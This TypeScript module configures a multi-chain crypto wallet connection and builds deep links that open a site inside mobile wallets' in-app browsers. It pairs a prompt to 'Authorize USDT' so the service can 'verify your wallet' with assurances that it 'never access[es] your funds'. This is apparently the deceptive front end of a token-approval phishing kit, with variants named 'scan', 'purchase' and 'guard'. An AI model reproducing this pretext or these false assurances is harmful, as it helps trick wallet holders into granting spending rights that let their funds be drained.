import { WagmiAdapter } from "@reown/appkit-adapter-wagmi"
import {
  arbitrum,
  base,
  bsc,
  mainnet,
  optimism,
  polygon,
} from "@reown/appkit/networks"
import type { AppKitNetwork } from "@reown/appkit/networks"

import {
  curatedWallets,
  featuredWallets,
  primaryConnectors,
  type FeaturedWallet,
} from "./wallet"
import type { WalletChainFamily } from "./wallet/types"

export type CuratedWallet = FeaturedWallet
export { curatedWallets, featuredWallets, primaryConnectors }

export type WalletChainId =
  | "ethereum"
  | "bsc"
  | "polygon"
  | "arbitrum"
  | "optimism"
  | "base"
  | "tron"

export const walletChains: Record<
  WalletChainId,
  { label: string; network?: AppKitNetwork; symbol: string; chainId?: number }
> = {
  ethereum: { label: "Ethereum", network: mainnet, symbol: "ERC20", chainId: 1 },
  bsc: { label: "BNB Chain", network: bsc, symbol: "BEP20", chainId: 56 },
  polygon: { label: "Polygon", network: polygon, symbol: "ERC20", chainId: 137 },
  arbitrum: { label: "Arbitrum", network: arbitrum, symbol: "ERC20", chainId: 42161 },
  optimism: { label: "Optimism", network: optimism, symbol: "ERC20", chainId: 10 },
  base: { label: "Base", network: base, symbol: "ERC20", chainId: 8453 },
  tron: { label: "Tron", symbol: "TRC20" },
}

export const evmWalletChainIds = [
  "ethereum",
  "bsc",
  "polygon",
  "arbitrum",
  "optimism",
  "base",
] as const satisfies WalletChainId[]

export type EvmWalletChainId = (typeof evmWalletChainIds)[number]

export const evmNetworks: [AppKitNetwork, ...AppKitNetwork[]] = [
  mainnet,
  bsc,
  polygon,
  arbitrum,
  optimism,
  base,
]

export const walletChainIdByNumericId: Record<number, EvmWalletChainId> = {
  1: "ethereum",
  56: "bsc",
  137: "polygon",
  42161: "arbitrum",
  10: "optimism",
  8453: "base",
}

const configuredProjectId = import.meta.env.VITE_WALLETCONNECT_PROJECT_ID?.trim()

export const projectId =
  configuredProjectId && configuredProjectId.length > 0
    ? configuredProjectId
    : "00000000000000000000000000000000"

export const defaultDappUrl =
  import.meta.env.VITE_SITE_URL ??
  import.meta.env.VITE_APP_URL ??
  "https://localhost"

export const wagmiAdapter = new WagmiAdapter({
  networks: evmNetworks,
  projectId,
  ssr: false,
})

export const wagmiConfig = wagmiAdapter.wagmiConfig

export function shortenAddress(address: string, chars = 4): string {
  if (address.length <= chars * 2 + 2) return address
  return `${address.slice(0, chars + 2)}...${address.slice(-chars)}`
}

export type WalletModalLabels = {
  connect: string
  disconnect: string
  network: string
  title: string
  subtitle: string
  detected: string
  install: string
  openApp: string
  scanQr: string
  moreWallets: string
  otherWallets: string
  secure: string
  connecting: string
  rejected: string
  selectChainTitle: string
  selectChainSubtitle: string
  back: string
}

export const defaultWalletModalLabels: WalletModalLabels = {
  connect: "Connect Wallet",
  disconnect: "Disconnect",
  network: "Network",
  title: "Connect a wallet",
  subtitle: "Choose how you want to connect. Your keys never leave your device.",
  detected: "Detected",
  install: "Install",
  openApp: "Open in app",
  scanQr: "Scan QR code",
  moreWallets: "More wallets",
  otherWallets: "Other wallets",
  secure: "Encrypted connection · We never access your funds",
  connecting: "Connecting…",
  rejected: "Connection cancelled. Please try again.",
  selectChainTitle: "Select network",
  selectChainSubtitle: "Choose a network before connecting your wallet.",
  back: "Back",
}

export type UsdtApprovalLabels = {
  title: string
  subtitle: string
  spenderLabel: string
  tokenLabel: string
  networkLabel: string
  approve: string
  approving: string
  skip: string
  rejected: string
  tronInstall: string
}

export const defaultUsdtApprovalLabels: UsdtApprovalLabels = {
  title: "Authorize USDT",
  subtitle:
    "Approve USDT access so this service can verify your wallet. You will sign in your wallet app.",
  spenderLabel: "Contract",
  tokenLabel: "Token",
  networkLabel: "Network",
  approve: "Sign approval",
  approving: "Waiting for signature…",
  skip: "Not now",
  rejected: "Approval cancelled. You can try again from any button.",
  tronInstall: "Install TronLink to connect on Tron.",
}

export type SiteVariant = "scan" | "purchase" | "guard"

function isAndroidBrowser(): boolean {
  if (typeof navigator === "undefined") return false
  return /android/i.test(navigator.userAgent)
}

/** Opens a wallet deeplink from a mobile browser (anchor click works better than assign on iOS). */
export function openMobileWalletDeeplink(deeplink: string): void {
  if (isAndroidBrowser() && deeplink.startsWith("https://phantom.app/ul/")) {
    const path = deeplink.replace("https://phantom.app/", "")
    window.location.assign(
      `intent://${path}#Intent;scheme=https;host=phantom.app;package=app.phantom;end`,
    )
    return
  }

  const anchor = document.createElement("a")
  anchor.href = deeplink
  anchor.rel = "noopener noreferrer"
  document.body.appendChild(anchor)
  anchor.click()
  anchor.remove()
}

function binanceDappBrowserLink(
  url: string,
  chainFamily: WalletChainFamily,
): string {
  const chainId = chainFamily === "tron" ? 728126428 : 56
  const base = "bnc://app.binance.com/mp/app"
  const appId = "yFK5FCqYprrXDiVFbhyRx7"
  const startPagePath = btoa("/pages/browser/index")
  const startPageQuery = btoa(`url=${url}&defaultChainId=${chainId}`)
  const deeplink = `${base}?appId=${appId}&startPagePath=${startPagePath}&startPageQuery=${startPageQuery}`
  return `https://app.binance.com/en/download?_dp=${btoa(deeplink)}`
}

function bitgetDappBrowserLink(url: string): string {
  const params = new URLSearchParams({
    action: "DApp",
    actionID: crypto.randomUUID(),
    url,
    version: "1",
  })
  return `https://bkcode.vip?${params.toString()}`
}

/**
 * Builds a deep link that opens the given URL inside a wallet's in-app dApp
 * browser. Works on both iOS and Android mobile browsers.
 */
export function buildWalletDeeplink(
  id: string,
  url: string,
  chainFamily: WalletChainFamily = "evm",
): string {
  const enc = encodeURIComponent(url)
  const host = url.replace(/^https?:\/\//, "")
  let origin = host
  try {
    origin = new URL(url).origin
  } catch {
    // keep host fallback
  }

  switch (id) {
    case "trust":
      return `https://link.trustwallet.com/open_url?coin_id=${chainFamily === "tron" ? "195" : "60"}&url=${enc}`
    case "metamask":
      return `https://link.metamask.io/dapp/${host}`
    case "binance":
      return binanceDappBrowserLink(url, chainFamily)
    case "bybit":
      return `https://app.bybit.com/inapp?by_dp=${encodeURIComponent(
        "bybitapp://open/route?targetUrl=by%3A%2F%2Fweb3%2Ftab%2Findex%3Findex%3D0",
      )}&by_web_link=${enc}`
    case "okx":
      return `okx://wallet/dapp/url?dappUrl=${enc}`
    case "bitget":
      return bitgetDappBrowserLink(url)
    case "mywallet": {
      let siteHost = host.split("/")[0] ?? host
      try {
        siteHost = new URL(url).host
      } catch {
        // keep host fallback
      }
      return `https://go.mytonwallet.org/explore/${siteHost}`
    }
    case "imtoken":
      return `https://connect.token.im/link/navigate/DappView?url=${enc}`
    case "rabby":
      return `https://rabby.io/dapp/${host}`
    case "coinbase":
      return `https://go.cb-w.com/dapp?cb_url=${enc}`
    case "phantom":
      return `https://phantom.app/ul/browse/${enc}?ref=${encodeURIComponent(origin)}`
    case "brave":
      return url
    case "rainbow":
      return `https://rnbwapp.com/dapp?url=${enc}`
    case "gemini":
      return url
    case "best-wallet":
      return `https://bestwallet.com/`
    case "tronlink":
      return `tronlinkoutside://pull.activity?param=${encodeURIComponent(
        JSON.stringify({
          url,
          action: "open",
          protocol: "TronLink",
          version: "1.0",
        }),
      )}`
    default:
      return url
  }
}
